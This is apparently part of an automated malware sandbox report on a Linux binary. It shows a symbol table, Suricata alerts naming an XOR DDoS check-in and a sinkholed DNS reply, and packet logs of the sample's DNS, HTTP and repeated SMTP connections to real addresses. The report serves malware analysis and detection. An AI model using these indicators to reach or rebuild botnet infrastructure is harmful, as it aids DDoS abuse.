__mpn_submul_1	.symtab	0x8098870	60	FUNC	<unknown>	DEFAULT	3
__mprotect	.symtab	0x8069e70	33	FUNC	<unknown>	DEFAULT	3
__mremap	.symtab	0x806add0	45	FUNC	<unknown>	DEFAULT	3
__munmap	.symtab	0x8069e50	31	FUNC	<unknown>	DEFAULT	3
__nanosleep	.symtab	0x80677b0	87	FUNC	<unknown>	DEFAULT	3
__nanosleep_nocancel	.symtab	0x80677ba	31	FUNC	<unknown>	DEFAULT	3
__new_exitfn	.symtab	0x8056000	274	FUNC	<unknown>	DEFAULT	3
__new_exitfn_called	.symtab	0x80d6240	8	OBJECT	<unknown>	DEFAULT	22
__new_fclose	.symtab	0x8057df0	439	FUNC	<unknown>	DEFAULT	3
__new_fopen	.symtab	0x80582a0	34	FUNC	<unknown>	DEFAULT	3
__new_getrlimit	.symtab	0x8069030	54	FUNC	<unknown>	DEFAULT	3
__new_sem_init	.symtab	0x8053320	84	FUNC	<unknown>	DEFAULT	3
__new_sem_post	.symtab	0x8053420	78	FUNC	<unknown>	DEFAULT	3
__new_sem_wait	.symtab	0x8053380	141	FUNC	<unknown>	DEFAULT	3
__nptl_create_event	.symtab	0x8054700	5	FUNC	<unknown>	DEFAULT	3
__nptl_deallocate_tsd	.symtab	0x8050980	278	FUNC	<unknown>	DEFAULT	3
__nptl_death_event	.symtab	0x8054710	5	FUNC	<unknown>	DEFAULT	3
__nptl_initial_report_events	.symtab	0x80d20cc	1	OBJECT	<unknown>	DEFAULT	22
__nptl_last_event	.symtab	0x80d20c0	4	OBJECT	<unknown>	DEFAULT	22
__nptl_nthreads	.symtab	0x80cf4f0	4	OBJECT	<unknown>	DEFAULT	21
__nptl_setxid	.symtab	0x8050e60	941	FUNC	<unknown>	DEFAULT	3
__nptl_threads_events	.symtab	0x80d20b8	8	OBJECT	<unknown>	DEFAULT	22
__offtime	.symtab	0x809f010	746	FUNC	<unknown>	DEFAULT	3
__open	.symtab	0x8053d80	91	FUNC	<unknown>	DEFAULT	3
__open_nocancel	.symtab	0x8053d8a	33	FUNC	<unknown>	DEFAULT	3
__opendir	.symtab	0x80672a0	220	FUNC	<unknown>	DEFAULT	3
__overflow	.symtab	0x805d810	41	FUNC	<unknown>	DEFAULT	3
__parse_one_specmb	.symtab	0x8083480	1320	FUNC	<unknown>	DEFAULT	3
__pause_nocancel	.symtab	0x8053dea	19	FUNC	<unknown>	DEFAULT	3
__posix_memalign	.symtab	0x80640d0	111	FUNC	<unknown>	DEFAULT	3
__preinit_array_end	.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__preinit_array_start	.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__printf_arginfo_table	.symtab	0x80d63e0	4	OBJECT	<unknown>	DEFAULT	23
__printf_fp	.symtab	0x807f620	9363	FUNC	<unknown>	DEFAULT	3
__printf_fphex	.symtab	0x8081b50	6104	FUNC	<unknown>	DEFAULT	3

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-20T15:33:13.222020+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	45489	8.8.8.8	192.168.2.23
2024-08-20T15:33:13.718862+0200	TCP	2021336	ET MALWARE DDoS.XOR Checkin via HTTP	1	35282	80	192.168.2.23	23.253.46.64

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 20, 2024 15:33:13.124733925 CEST	43928	443	192.168.2.23	91.189.91.42
Aug 20, 2024 15:33:13.222112894 CEST	35282	80	192.168.2.23	23.253.46.64
Aug 20, 2024 15:33:13.227087975 CEST	80	35282	23.253.46.64	192.168.2.23
Aug 20, 2024 15:33:13.227138042 CEST	35282	80	192.168.2.23	23.253.46.64
Aug 20, 2024 15:33:13.228722095 CEST	35282	80	192.168.2.23	23.253.46.64
Aug 20, 2024 15:33:13.234606981 CEST	80	35282	23.253.46.64	192.168.2.23
Aug 20, 2024 15:33:13.267611980 CEST	55162	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:13.718792915 CEST	80	35282	23.253.46.64	192.168.2.23
Aug 20, 2024 15:33:13.718806028 CEST	80	35282	23.253.46.64	192.168.2.23
Aug 20, 2024 15:33:13.718862057 CEST	35282	80	192.168.2.23	23.253.46.64
Aug 20, 2024 15:33:13.718862057 CEST	35282	80	192.168.2.23	23.253.46.64
Aug 20, 2024 15:33:14.276617050 CEST	55162	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:16.292418003 CEST	55162	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:18.354615927 CEST	55168	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:18.760607958 CEST	42836	443	192.168.2.23	91.189.91.43
Aug 20, 2024 15:33:18.794971943 CEST	35282	80	192.168.2.23	23.253.46.64
Aug 20, 2024 15:33:18.800295115 CEST	80	35282	23.253.46.64	192.168.2.23
Aug 20, 2024 15:33:18.800354004 CEST	35282	80	192.168.2.23	23.253.46.64
Aug 20, 2024 15:33:19.367868900 CEST	55168	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:19.523837090 CEST	42516	80	192.168.2.23	109.202.202.202
Aug 20, 2024 15:33:21.379574060 CEST	55168	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:23.416420937 CEST	55174	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:24.419157982 CEST	55174	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:26.434959888 CEST	55174	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:28.499319077 CEST	55180	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:29.506524086 CEST	55180	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:31.522152901 CEST	55180	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:33.572499990 CEST	55186	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:33.857954979 CEST	43928	443	192.168.2.23	91.189.91.42
Aug 20, 2024 15:33:34.593727112 CEST	55186	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:36.609445095 CEST	55186	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:38.657022953 CEST	55192	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:39.681061983 CEST	55192	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:41.696731091 CEST	55192	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:43.719938993 CEST	55198	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:44.736347914 CEST	55198	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:46.144150019 CEST	42836	443	192.168.2.23	91.189.91.43
Aug 20, 2024 15:33:46.752094984 CEST	55198	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:48.785633087 CEST	55204	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:49.791629076 CEST	55204	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:50.239583969 CEST	42516	80	192.168.2.23	109.202.202.202
Aug 20, 2024 15:33:51.807389975 CEST	55204	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:53.869000912 CEST	55210	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:54.878895044 CEST	55210	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:56.894637108 CEST	55210	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:58.928539038 CEST	55216	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:33:59.934195042 CEST	55216	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:01.949994087 CEST	55216	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:03.987798929 CEST	55222	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:04.989507914 CEST	55222	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:07.005206108 CEST	55222	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:09.052011967 CEST	55228	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:10.076772928 CEST	55228	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:12.092550993 CEST	55228	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:14.140652895 CEST	55234	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:14.812145948 CEST	43928	443	192.168.2.23	91.189.91.42
Aug 20, 2024 15:34:15.164206028 CEST	55234	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:17.179805994 CEST	55234	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:19.218540907 CEST	55240	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:20.219394922 CEST	55240	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:22.238468885 CEST	55240	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:24.274997950 CEST	55246	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:25.306662083 CEST	55246	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:27.322365046 CEST	55246	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:29.347565889 CEST	55252	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:30.362065077 CEST	55252	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:32.381663084 CEST	55252	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:34.420774937 CEST	55258	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:35.449285030 CEST	55258	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:37.464999914 CEST	55258	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:39.518601894 CEST	55264	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:40.536571026 CEST	55264	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:42.552249908 CEST	55264	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:44.609133959 CEST	55270	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:45.623898983 CEST	55270	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:47.639720917 CEST	55270	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:49.679954052 CEST	55276	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:50.711105108 CEST	55276	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:52.726885080 CEST	55276	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:54.739639997 CEST	55282	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:55.766475916 CEST	55282	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:57.782314062 CEST	55282	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:34:59.820101023 CEST	55288	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:35:00.821767092 CEST	55288	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:35:02.837486982 CEST	55288	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:35:04.885308981 CEST	55294	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:35:05.909179926 CEST	55294	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:35:07.924730062 CEST	55294	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:35:10.954925060 CEST	55300	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:35:11.956221104 CEST	55300	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:35:13.971852064 CEST	55300	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:35:16.008610010 CEST	55306	25	192.168.2.23	23.235.171.197
Aug 20, 2024 15:35:17.011642933 CEST	55306	25	192.168.2.23	23.235.171.197

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 20, 2024 15:33:13.210793972 CEST	45489	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:13.217689037 CEST	58011	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:13.222019911 CEST	53	45489	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:13.228251934 CEST	53	58011	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:13.228327036 CEST	48785	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:13.238188982 CEST	53	48785	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:13.238342047 CEST	43771	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:13.248281002 CEST	53	43771	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:13.248356104 CEST	57869	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:13.258411884 CEST	53	57869	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:13.258529902 CEST	58458	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:13.267524958 CEST	53	58458	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:18.269777060 CEST	43304	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:18.282238007 CEST	53	43304	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:18.282352924 CEST	51780	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:18.295133114 CEST	53	51780	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:18.295258999 CEST	53478	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:18.322721004 CEST	53	53478	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:18.322813988 CEST	54795	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:18.339209080 CEST	53	54795	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:18.339294910 CEST	39688	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:18.354532957 CEST	53	39688	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:23.359076977 CEST	37401	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:23.369297028 CEST	53	37401	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:23.369920969 CEST	34454	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:23.380069971 CEST	53	34454	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:23.380501032 CEST	51750	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:23.397413015 CEST	53	51750	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:23.398422003 CEST	48911	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:23.409084082 CEST	53	48911	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:23.409346104 CEST	49651	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:23.416302919 CEST	53	49651	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:28.418709040 CEST	59980	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:28.436206102 CEST	53	59980	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:28.436306000 CEST	57701	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:28.456479073 CEST	53	57701	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:28.457220078 CEST	53786	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:28.468933105 CEST	53	53786	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:28.469017982 CEST	36867	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:28.479259968 CEST	53	36867	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:28.479439020 CEST	57413	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:28.499183893 CEST	53	57413	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:33.499046087 CEST	59036	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:33.527622938 CEST	53	59036	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:33.527776003 CEST	40514	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:33.539046049 CEST	53	40514	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:33.539158106 CEST	43500	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:33.555068970 CEST	53	43500	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:33.555253983 CEST	57334	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:33.565102100 CEST	53	57334	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:33.565215111 CEST	36554	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:33.572416067 CEST	53	36554	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:38.576958895 CEST	50406	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:38.586992979 CEST	53	50406	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:38.587291956 CEST	42017	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:38.603593111 CEST	53	42017	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:38.603701115 CEST	41081	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:38.625411987 CEST	53	41081	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:38.625533104 CEST	50790	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:38.636445045 CEST	53	50790	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:38.636653900 CEST	37488	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:38.656827927 CEST	53	37488	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:43.660666943 CEST	47263	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:43.670757055 CEST	53	47263	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:43.670932055 CEST	58944	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:43.685909986 CEST	53	58944	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:43.686122894 CEST	54588	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:43.695863962 CEST	53	54588	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:43.695976019 CEST	50685	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:43.706366062 CEST	53	50685	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:43.710443974 CEST	39798	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:43.719875097 CEST	53	39798	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:48.724364996 CEST	49558	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:48.736217022 CEST	53	49558	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:48.736531973 CEST	34556	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:48.746845007 CEST	53	34556	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:48.747051954 CEST	52306	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:48.757909060 CEST	53	52306	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:48.758111000 CEST	55855	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:48.767620087 CEST	53	55855	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:48.767684937 CEST	51233	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:48.785546064 CEST	53	51233	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:53.790005922 CEST	41441	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:53.823205948 CEST	53	41441	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:53.823414087 CEST	42857	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:53.834819078 CEST	53	42857	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:53.834913015 CEST	35702	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:53.844042063 CEST	53	35702	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:53.844167948 CEST	43460	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:53.860893011 CEST	53	43460	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:53.860977888 CEST	44870	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:53.868809938 CEST	53	44870	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:58.873265028 CEST	34125	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:58.883702040 CEST	53	34125	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:58.883826017 CEST	56121	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:58.894099951 CEST	53	56121	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:58.894243956 CEST	46906	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:58.903830051 CEST	53	46906	8.8.8.8	192.168.2.23
Aug 20, 2024 15:33:58.903924942 CEST	41827	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:33:58.919605970 CEST	53	41827	8.8.4.4	192.168.2.23
Aug 20, 2024 15:33:58.919729948 CEST	52578	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:33:58.928422928 CEST	53	52578	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:03.933043957 CEST	56133	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:03.945302010 CEST	53	56133	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:03.945491076 CEST	34414	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:03.956146955 CEST	53	34414	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:03.956357002 CEST	56300	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:03.969789028 CEST	53	56300	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:03.969943047 CEST	49798	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:03.979603052 CEST	53	49798	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:03.979664087 CEST	57388	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:03.987632036 CEST	53	57388	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:08.989025116 CEST	47421	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:09.000402927 CEST	53	47421	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:09.000530958 CEST	45124	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:09.018481970 CEST	53	45124	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:09.018616915 CEST	40741	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:09.033356905 CEST	53	40741	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:09.033441067 CEST	45308	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:09.044285059 CEST	53	45308	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:09.044358969 CEST	52030	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:09.051935911 CEST	53	52030	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:14.056471109 CEST	44541	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:14.066730976 CEST	53	44541	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:14.066889048 CEST	45683	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:14.077651978 CEST	53	45683	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:14.077756882 CEST	51941	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:14.111656904 CEST	53	51941	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:14.111737967 CEST	51060	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:14.133721113 CEST	53	51060	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:14.133826017 CEST	37055	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:14.140583992 CEST	53	37055	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:19.143562078 CEST	60101	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:19.154084921 CEST	53	60101	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:19.154174089 CEST	34161	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:19.164902925 CEST	53	34161	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:19.164999962 CEST	34554	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:19.177695036 CEST	53	34554	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:19.177761078 CEST	55247	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:19.194538116 CEST	53	55247	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:19.194645882 CEST	49996	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:19.218457937 CEST	53	49996	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:24.222907066 CEST	57590	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:24.233237028 CEST	53	57590	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:24.233330965 CEST	46139	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:24.243072033 CEST	53	46139	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:24.243160009 CEST	44614	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:24.254429102 CEST	53	44614	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:24.254492044 CEST	39542	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:24.267159939 CEST	53	39542	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:24.267229080 CEST	46881	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:24.274929047 CEST	53	46881	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:29.278918982 CEST	36318	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:29.291583061 CEST	53	36318	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:29.291681051 CEST	35961	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:29.314192057 CEST	53	35961	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:29.314313889 CEST	54951	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:29.323683023 CEST	53	54951	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:29.323755980 CEST	56190	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:29.339569092 CEST	53	56190	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:29.339648008 CEST	47611	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:29.347484112 CEST	53	47611	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:34.352046013 CEST	34411	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:34.375806093 CEST	53	34411	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:34.375931978 CEST	57536	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:34.391058922 CEST	53	57536	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:34.391191006 CEST	44047	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:34.401767969 CEST	53	44047	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:34.401849031 CEST	34224	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:34.413877010 CEST	53	34224	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:34.413964033 CEST	37607	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:34.420672894 CEST	53	37607	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:39.425430059 CEST	33747	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:39.445445061 CEST	53	33747	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:39.445626020 CEST	56659	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:39.455568075 CEST	53	56659	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:39.455732107 CEST	35515	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:39.493314028 CEST	53	35515	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:39.493415117 CEST	49528	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:39.511337042 CEST	53	49528	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:39.511424065 CEST	49916	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:39.518507957 CEST	53	49916	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:44.522949934 CEST	54894	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:44.555475950 CEST	53	54894	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:44.556514978 CEST	48811	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:44.569109917 CEST	53	48811	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:44.572573900 CEST	39273	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:44.582562923 CEST	53	39273	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:44.582643032 CEST	39754	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:44.593102932 CEST	53	39754	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:44.600517035 CEST	40056	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:44.609062910 CEST	53	40056	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:49.611341953 CEST	57423	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:49.625333071 CEST	53	57423	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:49.625459909 CEST	53192	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:49.635902882 CEST	53	53192	8.8.4.4	192.168.2.23
Aug 20, 2024 15:34:49.636002064 CEST	59351	53	192.168.2.23	8.8.8.8
Aug 20, 2024 15:34:49.659149885 CEST	53	59351	8.8.8.8	192.168.2.23
Aug 20, 2024 15:34:49.659280062 CEST	33057	53	192.168.2.23	8.8.4.4
Aug 20, 2024 15:34:49.670355082 CEST	53	33057	8.8.4.4	192.168.2.23
